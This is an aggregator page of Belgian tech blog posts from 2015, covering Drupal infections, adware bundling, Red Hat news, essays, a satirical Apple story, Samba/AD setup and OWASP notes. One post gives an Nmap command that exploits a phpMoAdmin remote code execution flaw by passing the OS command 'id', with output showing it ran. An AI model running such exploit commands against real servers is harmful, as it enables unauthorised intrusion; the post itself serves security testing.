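Any PHP file under misc/farbtastic/ or an unexpected include in bootstrap.inc is a strong hint you're looking at the same infection; base64_decode hits in includes/ need a closer manual look, since core uses it legitimately in a few places.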

Is this a botnet quietly starting to gain ground, or an old hack that just never got activated? I wish I could tell you, but I'm hoping for the latter.

The post Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked appeared first on ma.ttias.be.

by Mattias Geniar at March 09, 2015 08:58 PM

Joram Barrez

Getting started with Activiti and Spring Boot published on The Spring Blog!

My article “Getting started with Activiti and Spring Boot” has been published today on The Spring Blog: https://spring.io/blog/2015/03/08/getting-started-with-activiti-and-spring-boot It fills me with great pride to be published there. I’ve been a fan of Spring for many years and believe that it houses many of the awesome developers in current Java-land. Anyway, please give the article […]

by Joram Barrez at March 09, 2015 02:05 PM

Frederic Hornain

[Red Hat][Docker] Check your Dockerfile syntax

Dockerfile tool


Type or paste your Dockerfile into the editor at

https://access.redhat.com/labs/linterfordockerfile/#/

and check whether your syntax is correct.

 

Kind Regards

Frederic

by Frederic Hornain at March 09, 2015 10:28 AM

March 08, 2015

Frederic Hornain

[Brussels] Red Hat JBoss Fuse Free hands-on lab on March 12 2015

Red Hat Benelux Workshop

 

Red Hat JBoss Middleware Hands-On Labs, join us for a free hands-on lab at one of our Benelux locations


Have you ever wondered how to get started with the Red Hat JBoss Middleware products? Are you unsure where to begin?
Do you like to receive information, but would prefer to work with the products on the spot?
Join us for one of our free JBoss Hands on Labs, (formerly known as Red Hat in-house Hackathons).
The next one will be on JBoss Fuse @ Arrow – http://www.arrowecs.be –
on Thursday March 12 2015 from 17:00
Woluwedal 30, Sint-Stevens-Woluwe, Brussels- 3rd floor

Fuse Workshop March 2015

 

/!\ Do not forget to register at the following URL :

http://www.redhatonline.com/benelux/workshops.php

Kind Regards

Frederic


by Frederic Hornain at March 08, 2015 02:13 PM

March 06, 2015

Mattias Geniar

Bundling Software Installs With Adware

The post Bundling Software Installs With Adware appeared first on ma.ttias.be.

This is obviously what users want.

For several years, Oracle has been bundling the Ask toolbar with its Java software for Windows PCs, often using deceptive methods to convince customers to install the unwanted add-on.

With the latest release of Java for the Mac, Oracle has begun bundling the Ask adware with default installations as well, changing homepages in the process.
Java adware on Mac OSX

Great job Oracle.

Thinking of installing uTorrent, one of the most popular BitTorrent clients? You'll get a free Bitcoin miner included. Guess who it's mining for? (spoiler: not your wallet)

When I updated uTorrent to version 3.4.2 build 28913 (32-bit) this morning it silently installed a piece of software called EpicScale.

EpicScale is a bitcoin miner that also purports to use your "unused processing power to change the world". It's easily noticeable by the increased CPU load when the computer is idle.
uTorrent Forum

To quote John Gruber: shitbags.

If you can't monetise your applications in any other way, you're doing it wrong.

Lessons learned from Lenovo's fiasco: absolutely zero.

The post Bundling Software Installs With Adware appeared first on ma.ttias.be.

by Mattias Geniar at March 06, 2015 11:50 AM

Frank Goossens

Music from Our Tube; Radiohead’s acoustic Subterranean Homesick Alien

Heard this on KCRW a couple of days ago and have it playing on repeat now; Radiohead with a beautiful acoustic version of “Subterranean Homesick Alien”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 06, 2015 06:18 AM

March 05, 2015

Frederic Hornain

[Red Hat Enterprise Linux 7 Atomic Host] Now Available

rhel_atomichost

As monolithic stacks give way to applications comprised of microservices, a container-based architecture can help enterprises to more fully realize the benefits of this more nimble, composable approach. Based on the world’s leading enterprise Linux platform, Red Hat Enterprise Linux 7 Atomic Host enables enterprises to embrace a container-based architecture, reaping the benefits of development and deployment flexibility and simplified maintenance, without sacrificing performance, stability, security, or the value of Red Hat’s vast certified ecosystem.

An application architecture based on Linux containers requires not only the tools to build and run containers, but also an underlying foundation that is secure, reliable, and enterprise-grade, with an established lifecycle designed to meet the ongoing requirements of the enterprise over the long term. These requirements include mitigation of security concerns, ongoing product enhancements, proactive diagnostics, and access to support. Red Hat is committed to offering enterprises a complete and integrated container-based infrastructure solution, combining container-based application packaging with robust, optimized infrastructure that will enable easy movement of Red Hat Enterprise Linux-certified applications across bare metal systems, virtual machines and private and public clouds – all of this with the product and security lifecycle that enterprise customers require. The release of Red Hat Enterprise Linux 7 Atomic Host delivers on Red Hat’s intent to make Linux containers a stable and reliable component of enterprise IT across the open hybrid cloud.

The Enterprise-Ready Container Host

Specifically designed to run Linux containers, Red Hat Enterprise Linux Atomic Host delivers only the operating system components required to run a containerized application, reducing overhead and simplifying maintenance. Because Red Hat Enterprise Linux 7 Atomic Host is built from Red Hat Enterprise Linux 7, it inherits Red Hat Enterprise Linux 7’s stability and maturity, as well as its vast ecosystem of certified hardware partners.

Security is always a top enterprise priority, but the security properties of containers – including the ability to maintain security across a container’s lifecycle – have raised additional questions. To address container security and lifecycle concerns, Red Hat Enterprise Linux Atomic Host offers automated security updates on-demand, bringing enterprise customers the support and lifecycle benefits that come with Red Hat Enterprise Linux in a reduced image size. From Heartbleed and Shellshock to Ghost and beyond, Red Hat customers receive security notifications and product updates as they are available and also have access to security tools that address container reliability and security. This is a benefit Red Hat uniquely brings to container deployments for enterprise customers.

For building and maintaining container infrastructure, Red Hat Enterprise Linux 7 Atomic Host provides many benefits, including:

 

Ref :

http://www.redhat.com/en/about/press-releases/red-hat-launches-red-hat-enterprise-linux-7-atomic-host-advances-linux-containers-enterprise

Kind Regards

Frederic


by Frederic Hornain at March 05, 2015 05:26 PM

March 04, 2015

Xavier Mertens

phpMoAdmin 0-day Nmap Script

A 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on MongoDB databases with the help of a nice web interface. The vulnerability is critical because it allows unauthenticated remote code execution. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests for the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as follows:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php \
                    http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!

by Xavier at March 04, 2015 09:10 AM

March 03, 2015

Lionel Dricot

How could it have been otherwise?

768478496_5775726141_z

The twists of human psychology mean that, from cycling to politics, one can be an honest cheat, a liar who tells the truth, and a corrupt official acting in good faith. What if it were not people who corrupt institutions, but rather institutions which, by their very construction, leave people no choice?

I have always imagined that a young cyclist starting out must be an idealist. He will have heard about doping. Perhaps even seen it first-hand. But he would do without it, even if it meant not always winning. His talent would make up for it. And anyway, winning a single stage was the goal of his career, not stringing together several grand tours.

As time went on, he ran into difficulties. Opportunities presented themselves. Following some advice and a head cold, a medicine helped him a great deal for the next day's race.

Was it doping? Certainly not. And besides, what is doping, really? An arbitrary list of products? Without the medicine, his performance collapsed. But that substance, combined with a particular treatment from the team's soigneur, had an invigorating effect. Without being doping. Not the "real" kind.

Then there was that one race. The day before, he was feeling a bit under the weather. But a big sponsorship contract was on the line if he finished in the top ten. There was a bonus that would easily cover the work on the house he had gone into debt for. It was just this once. Not really doping as the newspapers describe it, with big syringes. No, just a little help. Just this once.

When the news of his disqualification appeared in the papers, the cyclist burst into tears. No, he had never doped. Not "really". Not "doped". It was unfair. Besides, he was one of those who took the fewest products while still getting results. He was honest. He sincerely believed himself the victim of an injustice.

No, he was not lying! He was deeply convinced. It was not really doping. After all, what is doping? And besides, between us, did he even have a choice? How could he have done otherwise?

*

After years of political activism, and thanks to a combination of circumstances involving several resignations, here you are, sitting in an office, holding your first position as an elected official. You cannot help feeling proud. An idealist, you finally see a way to act, to make the world around you better, more humane, more just.

Your job, you quickly realise, consists of spending public money. But careful, you are going to do it properly! Like a good manager! Even if this is the first time in your life that you have the power to hand out millions, you do not intend to let yourself be dazzled.

On your desk sits a request to subsidise the organisation of an esoteric music festival.

You have never heard of esoteric music, but something catches your attention: the organiser is none other than a childhood friend! The file is well put together and the festival takes place every year. It looks very good. The request is only for €100,000. A drop in your budget! In short, you see no reason to refuse this to a childhood friend, and you grant the funding.

The next day, your nephew tells you he is looking for a job as a graphic designer. During the conversation, he mentions that he draws his inspiration from esoteric music. That gives you an idea. You make a quick phone call to your childhood friend to announce that you have granted the subsidy. And you ask whether the festival, now backed by that subsidy, might not need the services of a graphic designer. Your friend asks for your nephew's contact details.

You are satisfied; you have done everyone a favour. You feel useful.

A few weeks later, you receive a request for a similar festival. In all honesty, you refuse. One esoteric music festival is quite enough. Even though, this time, the request comes from a large company specialised in organising this type of event.

The next day, the director of the production company calls to ask for a meeting. Once in your office, he asks the reasons for your refusal. You lay them out. The director then announces that he has discovered that the festival you are referring to is organised by one of your friends. And that it is a shame to favour one's friends.

You are flabbergasted! You do not favour your friends. It is simply that his festival applied for the subsidies first, for subsidies half the size, and that it takes place every year. Isn't that enough?

The director of the production company then offers to buy out the company organising the current festival. So you set up a meeting with your friend and this director.

Your friend argues that the current structure is a non-profit organisation. The director then offers to buy the image rights and the name for €50,000. Your friend will also be hired by the company as organiser and will earn a good salary. You then bring up the fact that your nephew is also employed by the association. The director promises to hire him.

The deal is done, and you take part in setting up the whole process, outside your working hours. The director then asks you to send your invoices for the hours you spent on the file. The director himself is willing to pay "up to 200 hours of work". In a hurry, you set up a company with your spouse in order to issue that invoice at a rate of €100 per hour.

The following year, you discover that the requested subsidy has risen to €200,000. But the festival has grown, that is normal, so you grant it.

Since you earned €20,000 with the previous festival, you come to realise that you are gifted. Isn't the rate proportional to the skill? To think that it used to take you a year to earn such a sum! At last you have found your calling, your talent! You then suggest to your friend that you launch another type of festival, so that this concept too can be sold on. This time, you set up a company directly with your friend. But your friend creates a non-profit which will subcontract the organisation to the company in question. Because subsidies cannot be given to a company. Your company is now called "Festival Consult".

Your friend officially resigns, only to keep doing the same job as before, but this time billing his hours through Festival Consult. An excellent idea. On top of that, it lets him pay less tax. The large company also asks you for advice on organising several other festivals, and you can bill for your expertise.

A sensationalist rag suddenly seizes on the affair and you discover that you are accused of corruption. Corruption!
You? Never! What a scandal! All you did was put your skills, in your spare time, at the service of organising music festivals.

You do not even understand what you are being accused of. You can only be innocent. Besides, what is corruption? If you had to do it all over again, you cannot even see what you would change! In all honesty, how could you have acted otherwise?

Photo by Coolmonfrere.

Thank you for taking the time to read this post, for which payment is entirely voluntary. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

flattr this!

by Lionel Dricot at March 03, 2015 09:45 PM

Frank Goossens

Quick tip; disabling WordPress author pages

I helped build a WordPress-site for a not-for-profit and they asked me to disable the author pages. Although I’m sure there are multiple plugin-based solutions, I ended up simply adding an author.php to my (child) theme with this in it;

<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
?>

As author.php is used for all author pages (if available, else archive.php is used), every attempt to reach an author page will result in a permanent redirect being sent, effectively disabling the author archive. Keeping it simple stupid!
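
For completeness: if you'd rather not add a template file, a roughly equivalent approach (a sketch, hooked from the child theme's functions.php) is to catch author requests on template_redirect:

<?php
// In the child theme's functions.php: send all author archives to the homepage.
add_action( 'template_redirect', function () {
    if ( is_author() ) {
        wp_redirect( home_url( '/' ), 301 );
        exit;
    }
} );

Both variants do the same thing; the author.php approach above has the advantage of not touching any hooks.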

by frank at March 03, 2015 07:19 PM

March 02, 2015

Wouter Verhelst

NBD 3.9

I just released NBD 3.9

When generating the changelog, I noticed that 3.8 happened two weeks shy of a year ago, which is far too long. As a result, the new release has many new features:

Get it at the usual place.

March 02, 2015 07:39 PM

Dries Buytaert

How much money to raise for your startup? [Flowchart]

From time to time, people ask me how much money to raise for their startup. I've heard other people answer that question with everything from "never raise money" to "as little as you need" to "as much as you can".

The reason the answers vary so much is because what is best for the entrepreneur is seemingly at odds with what is best for the business. For the entrepreneur, the answer can be as little as necessary to avoid dilution or giving up control. For the business, more money can increase its chances of success. I feel the right answer is somewhere in the middle -- focus on raising enough money, so the company can succeed, but make sure you still feel good about how much control or ownership you have.

But even "somewhere in the middle" is a big spectrum. What makes this so difficult is that it is all relative to your personal risk profile, the quality of the investors you're attracting, the market conditions, the size of the opportunity, and more. There are a lot of parameters to balance.

I created the flowchart below (full-size image) to help you answer the question. This flowchart is only a framework -- it can't take into account all decision-making parameters. The larger the opportunity and the better the investors, the more I'd be willing to give up. It's better to have a small part of something big, than to have a big part of something small.

How much money to raise for your startup

Some extra details about the flowchart:

  • In general, it is good to have 18 months of runway. It gives you enough time to figure out how to get your company to the next level, but still keeps the pressure on.
  • Add 6 months of buffer to handle unexpected bumps or budgeting oversights.
  • If more money is available, I'd take it as long as you don't give away too much of your company. As a starting point for how much control to give up, I use the following formula: 30% - (5% x number of the round). So if you are raising your series A (round 1), don't give away more than 25% (30 - (5 x 1)). If you are raising your series B (round 2), don't give away more than 20% (30 - (5 x 2)). If you start with 50% of the shares, using this formula, you'll still have roughly 20% of the company after 5 rounds (depending on other dilutive events such as option pool increases); the small sketch below works that out.
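
A minimal sketch (my own, purely illustrative) of how the numbers in that rule of thumb play out over five rounds:

<?php
// Maximum equity to give up in round N: 30% - (5% x N), per the formula above.
function max_dilution($round) {
    return 0.30 - 0.05 * $round;
}

$ownership = 0.50; // assume founders start with 50% of the shares
for ($round = 1; $round <= 5; $round++) {
    $ownership *= 1 - max_dilution($round);
    printf("Round %d: give up at most %d%%, founders keep ~%.1f%%\n",
           $round, max_dilution($round) * 100, $ownership * 100);
}
// Ends with founders keeping roughly 21.8%, i.e. the "roughly 20%" mentioned above.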

My view is that of an entrepreneur having raised over $120 million for one startup. If you're interested in an investor's view that has funded many startups, check out Michael Skok's post. Michael Skok is Acquia's lead investor and one of Acquia's Board of Directors. We both tried to answer the question from our own unique viewpoint.

by Dries at March 02, 2015 01:52 PM

February 28, 2015

Lionel Dricot

The end of advertising at Apple?

7178643521_c0b1e40ec2_z

Unless you live on another planet, you cannot have missed the announcement Tim Cook made during Apple's latest keynote. The least one can say is that Apple knows how to create buzz. And whether you are an Apple fanboy or, on the contrary, deeply outraged by the announcement, the fact is that nobody can remain indifferent.

Because, despite record revenue, many analysts had marked 2016 as the year of every danger for the Cupertino firm.

After Microsoft's definitive acquisition of Cyanogenmod and the compatibility mode announced in Windows 11, Android has established itself once and for all as the reference mobile platform, from watches to giant televisions, by way of e-readers and computers. After Google's Chromebooks, Amazon's Kindles and Samsung's televisions, it is now Microsoft's turn to make itself 100% compatible with Android applications.

A godsend for developers, who now only have to develop for a single platform? No, because one platform still holds out against the invader: Apple. Once the developers' darling, it is now being subtly neglected. It is no longer rare to find applications running on Android with no equivalent on the iPhone, something unthinkable only two years ago.

Apple in trouble and losing momentum? Even if the weakness is only relative, Google could not let the opportunity pass to deal a fatal blow to its adversary. Breaking the tacit non-aggression truce, the Mountain View giant's lawyers decided to sue Apple for the illegal use of several patents, patents mostly dedicated to displaying advertising in mobile applications and app stores. The idea is very simple: deprive Apple of a substantial part of its revenue while forcing it to pay a hefty fine.

But Tim Cook's response the day before yesterday left the Internet speechless.

From now on, advertising will quite simply no longer be accepted in applications on the App Store. Safari will include an ad blocker by default. A hurricane in the mobile world. A genuine revolution for the entire software industry.

"Apple's mission is to offer its users the best experience. An experience of comfort, luxury and productivity," declared Tim Cook, avoiding any direct reference to the ongoing litigation. "Advertising does not meet those criteria. Worse, most applications that embed advertising do so in order to degrade the experience and convince the user to switch to the paid version."

But the firm does not intend to stop there.

"We will gradually put in place a subscription giving free access to all applications on the App Store, without any restriction. Application authors will receive a percentage of that subscription based on the number of users and the usage of their applications. In this way we hope to build a system that is fairer and more attractive for small developers, but also simpler and more efficient for users, who can install and uninstall according to their needs. We are thus continuing the Pay Once and Play logic introduced in 2015."

For most content publishers living off advertising, the news is a catastrophe. Some press organisations are even considering taking Apple to court. But as Tim Cook explained, alternatives exist.

"For years, Apple products have automatically blocked intrusion attempts and the installation of malicious software. Technically, advertising can be seen as the installation of malicious software in the user's brain. From an ethical point of view, a company whose vocation is to serve its users cannot fail to block it."

"As for websites that live off advertising, we encourage them to develop a dedicated application. That will allow them to receive a share of the App Store subscriptions taken out by their users. They will then be able to focus on satisfying their users, and no longer the middlemen of the advertising world."

On Twitter, messages are running wild, and the most cynical have of course pointed out the hypocrisy of the fact that Apple is a company with particularly well-oiled marketing, whose advertisements can be found in every major city. Apple's official Twitter account has, for that matter, responded:

There's a thin line between information and advertising.

Our goal is to ensure that our communication is like our product: efficient, elegant, useful and never intrusive.

Whatever the case, this is news that will certainly shake things up and that could, in time, prove beneficial for users.

Photo by Mike Deerkoski.

Thank you for taking the time to read this post, for which payment is entirely voluntary. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

flattr this!

by Lionel Dricot at February 28, 2015 05:20 PM

Frank Goossens

More goodness in wordpress.org plugin repo updates

Seems like the wordpress.org plugin pages, after recent improvements to the ratings logic, now got an even more important update. They now use “active installations” as the most important metric (as has been done on drupal.org module pages for years), with the total number of downloads having been relegated to the stats page.

That stats page got a face-lift as well, featuring a graph of the active versions:

autoptimize wp.org plugin page

In case you’re wondering what the source of that “active installations” data is, I was too and reached out to plugin-master Otto (Samuel Wood), who replied:

[The source data comes from] plugin update checks. Every WP install asks for update checks every 12 hours or so. We store a count of that info.

by frank at February 28, 2015 08:51 AM

February 26, 2015

Xavier Mertens

The Evil CVE: CVE-666-666 – “Report Not Read”

I had an interesting discussion with a friend this morning. He explained that, when he is conducting a pentest, he sometimes does not hesitate to add a specific finding to his report about the lack of attention given to previous reports. Some companies are motivated by good intentions and ask for regular pentests against their infrastructure or a specific application, but what if they don’t even seem to read the report and take it into account to improve their security level? What if the same security issues are discovered during the next tests? This does not motivate the pentester and costs a lot of money for nothing.

The idea of the “evil” CVE popped up during our chat. What about a specific CVE number to report the issue of not reading previous reports? As defined by Wikipedia, the “Common Vulnerabilities and Exposures” (CVE) system provides a reference method for publicly known information-security vulnerabilities and exposures. And a vulnerability can be defined as a weakness in a product or infrastructure that could allow an attacker to compromise the integrity, availability or confidentiality of that product or infrastructure.

Based on this definition, not reading the previous pentest report and not taking the corrective actions listed in it is a new vulnerability! A good pentest report should contain vulnerabilities and mitigations to remove (or reduce) the associated risks. It is foolish not to read the report and apply the mitigations, even more so when some of them can be implemented quickly (and sometimes cheaply). Think about the evil CVE-666-666 while writing your future reports! Note that the goal is not to blame the customer (who also pays you!) but to educate him.

 

by Xavier at February 26, 2015 08:41 PM

Wouter Verhelst

Dear non-Belgian web developer,

Localization in the web context is hard, I know. To make things easier, it may seem like a good idea to use GeoIP to detect what country an IP is coming from and default your localization based on that. While I disagree with that premise, this blog post isn't about that.

Instead, it's about the fact that most of you get something wrong about this little country. I know, I know. If you're not from here, it's difficult to understand. But please get this through your head: Belgium is not a French-speaking country.

That is, not entirely. Yes, there is a large group of French-speaking people who live here. Mostly in the south. But if you check the numbers, you'll find that there are, in fact, more people in Belgium who speak Dutch rather than French. Not by a very wide margin, mind you, but still by a wide enough margin to be significant. Wikipedia claims the split is 59%/41% Dutch/French; I don't know how accurate those numbers are, but they don't seem too wrong.

So please, pretty please, with sugar on top: next time you're going to do a localized website, don't assume my French is better than my English. And if you (incorrectly) do, then at the very least make it painfully obvious to me where the "switch the interface to a different language" option in your website is. Because while it's annoying to be greeted in a language that I'm not very good at, it's even more annoying to not be able to find out how to get the correctly-localized version.

Thanks.

February 26, 2015 09:22 AM

Frank Goossens

wordpress.org plugin repo: ratings changed

Yesterday the average rating of all plugins on the wordpress.org repository changed; ratings that were not linked to a review were removed. That means that ratings dating from before approximately November 2012, when reviews were introduced, are not taken into account any more.

This had a positive impact on the average rating of my own plugins, but especially so for Autoptimize. That plugin was largely unsupported before I took over in January 2013 and got some low ratings as a consequence (the average was 4.2 at the time, if I’m not mistaken). With those old numbers now out of the way, the average went from 4.6 to 4.8 overnight. Yay!

[Update: a couple of days later there were even more changes on the WordPress Plugin pages.]

by frank at February 26, 2015 06:36 AM

February 25, 2015

Mattias Geniar

Up And Close With PHP 7’s New RFCs

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

If you're following the development of PHP 7, you'll notice a lot of new RFCs (and some old ones that have been revived) are popping up again. How do you keep track of them and test their functionality?

The answer always used to be: compile PHP from the latest sources and test it yourself. But that's not very handy, is it?

RFC Watch

Enter the PHP RFC Watch, a very cool side-project of Benjamin Eberlei.

php_rfc_watch

It keeps track of the different PHP RFCs, who voted and what they voted. You can filter on the open RFCs at the right-hand side.

Testing new RFC functionality

The PHP community has been really fortunate to have a tool like 3v4l.org, which allows you to spin up a PHP/HHVM shell to test some PHP code -- free of charge!

And as of a few days ago, there is also support for RFC branches of PHP that you can test!

For instance, want to try out the new Scalar Type hints in PHP7? It includes the strict_mode option and you can test it out in an online shell!

<?php
declare(strict_types=1);
 
foo(); // strictly type-checked function call
 
function foobar() {
    foo(); // strictly type-checked function call
}
 
class baz {
    function foobar() {
        foo(); // strictly type-checked function call
    }
}
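
To see strict mode actually do something, here's a tiny self-contained variation you could paste into 3v4l.org (my own sketch, not the RFC's example):

<?php
declare(strict_types=1);

// Parameters are scalar type hinted; under strict_types=1 no silent coercion happens.
function add(int $a, int $b) {
    return $a + $b;
}

echo add(1, 2), "\n";   // 3
echo add("1", 2), "\n"; // throws a TypeError instead of coercing "1" to 1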

This is a really cool resource, I hope more RFC branches make their way to it.

Props to @3v4l_org!

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

by Mattias Geniar at February 25, 2015 09:27 PM

Frank Goossens

So the state stands in the way of innovation?

In the hip world of startups and self-declared innovators, the state is all too easily dismissed as the big obstacle to real innovation. And then you read this;

Fundamental innovation takes at least ten to fifteen years, Mazzucato writes, but the attention span of private venture capitalists is five years at most. They only come into play once the biggest risks have already been taken by the state. […] But if you keep dismissing the state as a lumbering fool, you will never get anywhere. In the beginning it is not the invisible hand of the market, but the visible hand of the state that shows the way. Government is not there merely to prevent market failure. Without the state there would, in many cases, not even be a market.

You can read the full article (built around the research of the Italian economist Mariana Mazzucato and applied to Silicon Valley, but also to ASML closer to home) on De Correspondent.

by frank at February 25, 2015 12:00 PM

Sébastien Wains

Samba integrated to Active Directory on RHEL7

Tested with Active Directory 2003 and RHEL 7.0

For RHEL 6.0 see here

I assume the server is correctly set up: its hostname should be set according to the Active Directory domain, and it should be synchronised with NTP, since clock drift can cause issues with Kerberos.

I assume an AD domain "EXAMPLE" (long name: intranet.example.org)

# host -t srv _kerberos._tcp.intranet.example.org
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00a.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00c.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00b.intranet.example.org.

Install the packages:

# yum -y install authconfig samba samba-winbind samba-winbind-clients pam_krb5 krb5-workstation oddjob-mkhomedir nscd adcli ntp

Start the services and enable them at boot:

# systemctl start smb
# systemctl enable smb
# systemctl start winbind
# systemctl enable winbind
# systemctl start oddjobd 
# systemctl enable oddjobd
# systemctl start dbus

Edit /etc/krb5.conf:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = INTRANET.EXAMPLE.ORG
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true

[realms]
 EXAMPLE.COM = {
  kdc = kerberos.example.com
  admin_server = kerberos.example.com
 }

 INTRANET.EXAMPLE.ORG = {
 }

[domain_realm]
 .example.com = EXAMPLE.COM
 example.com = EXAMPLE.COM
 intranet.example.org = INTRANET.EXAMPLE.ORG
 .intranet.example.org = INTRANET.EXAMPLE.ORG

Test Kerberos:

# kinit username@INTRANET.EXAMPLE.ORG
# klist

username should be a domain admin in the Active Directory.

klist should give this kind of output:

Ticket cache: FILE:/tmp/krb5cc_0
Default principal: username@INTRANET.EXAMPLE.ORG

Valid starting       Expires              Service principal
02/25/2015 15:23:30  02/26/2015 01:23:30  krbtgt/INTRANET.EXAMPLE.ORG@INTRANET.EXAMPLE.ORG
    renew until 03/04/2015 15:23:28

Delete the Kerberos ticket you just initialized:

# kdestroy

Edit /etc/samba/smb.conf:

[global]
workgroup = EXAMPLE
realm = INTRANET.EXAMPLE.ORG
security = ads
idmap uid = 10000-19999
idmap gid = 10000-19999
idmap config EXAMPLE:backend = rid
idmap config EXAMPLE:range = 10000000-19999999
;winbind enum users = no
;winbind enum groups = no
;winbind separator = +
winbind use default domain = yes
winbind offline logon = false
template homedir = /home/EXAMPLE/%U
template shell = /bin/bash

    server string = Samba Server Version %v

    log file = /var/log/samba/log.%m
    log level = 10
    max log size = 50
    passdb backend = tdbsam

[share]
    path = /home/share
    comment = Some cool directory
    writable = yes
    browseable = yes
    # there's a trust between EXAMPLE and EXAMPLE2
    valid users = username EXAMPLE2\username
    directory mask = 0777
    create mask = 0777

Restart Samba:

# systemctl restart smb

Join the domain:

# net join -S EXAMPLE -U username

It should work and you can then get information regarding the join:

# net ads info
LDAP server: 192.168.0.1
LDAP server name: SRV00C.intranet.example.org
Realm: INTRANET.EXAMPLE.ORG
Bind Path: dc=INTRANET,dc=EXAMPLE,dc=ORG
LDAP port: 389
Server time: Wed, 25 Feb 2015 15:27:05 CET
KDC server: 192.168.0.1
Server time offset: 0

Create the directory for AD users:

# mkdir /home/EXAMPLE/
# chmod 0777 /home/EXAMPLE/

Restart Winbind:

# systemctl restart winbind
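
As a quick sanity check (not part of the original procedure, and assuming winbind has been added to /etc/nsswitch.conf, e.g. via authconfig), you can verify that winbind talks to the domain:

# wbinfo -t                # verify the machine account trust with a domain controller
# wbinfo -u                # list domain users through winbind
# wbinfo -g                # list domain groups
# getent passwd username   # resolve a domain user via NSS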

Sources:

redhat.com

February 25, 2015 05:00 AM

February 24, 2015

Xavier Mertens

OWASP Belgium Chapter Meeting February 2015 Wrap-Up

Jim on stage
Tonight the first OWASP Belgium chapter meeting of the year 2015 was organized in Leuven. Alongside the SecAppDev event, also organised in Belgium last week, many nice speakers were present in the country, so it was a good opportunity to ask them to present a talk at a chapter meeting. As usual, Seba opened the event and reviewed the latest OWASP Belgium news before giving the floor to the speakers.

The first speaker was Jim DelGrosso from Cigital. Jim talked about “Why code review and pentests are not enough?”. His key message was the following: penetration tests are useful but they can’t find all types of vulnerabilities, and that’s why other checks are required. So how to improve our security tests? Before conducting a penetration test, a good idea is simply to check the design of the target application: some flaws can already be found there! At this point, it is very important to make a difference between a “bug” and a “flaw”. Bugs are related to implementation and flaws are “by design”. The ratio between bugs and flaws is almost 50/50. Jim reviewed some examples of bugs: XSS or buffer overflows are nice ones. To sum up, a bug is related to “coding problems”. And the flaws? Examples are weak, missing or wrong security controls (ex: a security feature that can be bypassed by the user). But practically, how to find them? Are there tools available? To find bugs, the classic code review process is used (we look at patterns). Pentests can also find bugs, but overlap with finding flaws. Finally, a good analysis of the architecture will focus on flaws. Jim reviewed more examples just to be sure that the audience made the difference between the two problems:

Then Jim asked the question: “How are we doing?” regarding software security. The OWASP Top-10 has been a good reference for almost ten years now for most of us. Jim compared the different versions across the years and demonstrated that the same attacks remain but their severity level changes regularly. Also, seven of them have been the same for ten years! Does it mean that they are very hard to solve? Do we need new tools? Some vulnerabilities dropped or disappeared because developers use today’s frameworks, which are better protected. Others are properly detected and blocked; a good example is XSS attacks being blocked by modern browsers. Something new appeared in 2013: the usage of components with known vulnerabilities (dependencies in apps).

So practically, how to find flaws? Jim recommends performing code reviews. Penetration tests will find fewer flaws and will require more time. But we need something else: a new type of analysis focusing on how we design a system, and a different set of checklists. That’s why the IEEE Computer Society started a project to expand their presence in security. They started with an initial group of contributors and built a list of points to avoid the classic top-10 security flaws:

Heartbleed is a nice example to demonstrate how integrating external components may increase your attack surface. In this case, the openssl library is used to implement new features (cryptography) but also introduced a bug. To conclude his presentation, Jim explained three ways to find flaws:

A very interesting approach to a new way of testing your applications! After a short break, the second speaker, Aurélien Francillon from EURECOM, presented “An analysis of exploitation behaviours on the web and the role of web hosting providers in detecting them”. To be more precise, the talk was about “web honeypots”. Today, most companies have a corporate website or web applications, often hosted on a shared platform maintained by a hosting provider. How do they handle the huge amount of malicious traffic sent and received by their servers? The first part was dedicated to the description of the web honeypot built by EURECOM. The goal was to understand what the motivations of web attackers were, what they do while and after exploiting a vulnerability on a website, and why attacks are carried out (for fun, profit, damage, etc). There were previous studies, but they lacked such details.
Aurélien on stage

How to deploy the honeypot? Aurélien explained that 500 vulnerable websites were deployed on the Internet using 100 domains registered with five subdomains each. They were hosted on nine of the biggest hosting providers. Each website had five common CMSs with classic vulnerabilities. Once deployed, the data collection ran for 100 days. Each website acted as a proxy and its traffic was redirected to the real web apps running on virtual machines. Why? It’s easy to reinstall, they allow full logging and it’s easy to tailor and limit the attackers’ privileges. The amount of collected data was impressive:

Aurélien gave some facts about the different phases of an attack:

Based on the statistics, some trends were confirmed:

